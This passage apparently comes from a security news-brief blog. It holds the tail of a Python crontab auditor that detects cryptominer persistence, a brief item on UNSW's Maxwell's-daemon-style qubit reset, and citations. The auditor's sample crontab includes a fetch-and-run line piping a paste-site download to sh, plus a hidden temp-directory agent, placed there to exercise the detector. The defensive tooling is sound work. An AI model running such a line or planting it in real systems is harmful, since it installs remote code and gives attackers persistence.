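        vals = sorted({int(v) for v in field.split(",")})
        if len(vals) == 1:
            return 60
        gaps = [b - a for a, b in zip(vals, vals[1:])] + [vals[0] + 60 - vals[-1]]
        return min(gaps)
    return None


def audit_crontab(text: str, max_ok_interval: int = 10) -> List[Tuple[str, List[str]]]:
    """Return (entry, reasons) for every crontab entry that looks like a re-download loop or similar."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:   # comments and VAR=value lines
            continue
        if line.startswith("@"):                                         # @reboot, @hourly, ...
            minute = hour = None
            command = line.split(None, 1)[1] if " " in line else ""
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            minute, hour, command = fields[0], fields[1], fields[5]
        reasons = []
        interval = minute_interval(minute) if minute else None
        if hour == "*" and interval is not None and interval <= max_ok_interval:
            reasons.append(f"runs every {interval} min")
        if PIPE_TO_SHELL.search(command):
            reasons.append("downloads and pipes to a shell")
        if PASTE_SITES.search(command):
            reasons.append("fetches from a paste site")
        if DECODE_AT_RUNTIME.search(command):
            reasons.append("decodes base64 at run time")
        if TEMP_EXEC.search(command):
            reasons.append("executes from a world-writable temp directory")
        if reasons:
            findings.append((line, reasons))
    return findings


# Constructed sample, not a captured crontab; the paste URL is a placeholder.
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
30 2 * * 0 /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL https://pastebin.com/raw/EXAMPLE | sh
@reboot /dev/shm/.x/agent
"""

if __name__ == "__main__":
    for entry, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"{entry}\n    -> {', '.join(reasons)}")
```

Run it over every user's crontab (crontab -l -u for each account) as well as /etc/crontab and /etc/cron.d/*; a miner's re-download loop that reinstalls every 10 minutes means killing the process without removing the cron entry only buys you 10 minutes.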
Fiser, David and Alfredo Oliveira, Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT, blog post, 12 December 2022. Available online at https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html.
UNSW Resets Qubits With Maxwell's Daemon
A story that slipped under our radar for a while: Every student who studies thermodynamics encounters Maxwell's Daemon, a thought-experiment daemon which, by opening a door between two chambers when a highly-excited particle approaches it and closing the door to slow ones, can create a temperature difference between the two, thereby driving a heat engine and achieving - in theory - perpetual motion. Such a daemon is impossible, of course - the daemon itself needs to consume energy to observe the particles and move the door.
But in a modern twist on the idea, quantum computing engineers at the University of New South Wales have achieved something similar, using a fast digital voltmeter to observe the temperature of electrons drawn from a warm pool of electrons. In doing so, they make the electron much cooler than the pool it came from, which corresponds to it being in the '0' state.
This is the basis of their new technique for resetting the state of electron spin silicon qubits. The old technique works by cooling electrons to a temperature near absolute zero, and hoping that all the electrons 'relax' to the '0' state, but this still leaves a 20% probability that the electron will be a '1'. The new technique reduces the probability of error to 1% - a major step in improving the reliability of quantum computers.
UNSW Media, New quantum computing feat is a modern twist on a 150-year-old thought experiment, news release, 30 November 2022. Available online at https://newsroom.unsw.edu.au/news/science-tech/new-quantum-computing-feat-modern-twist-150-year-old-thought-experiment.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
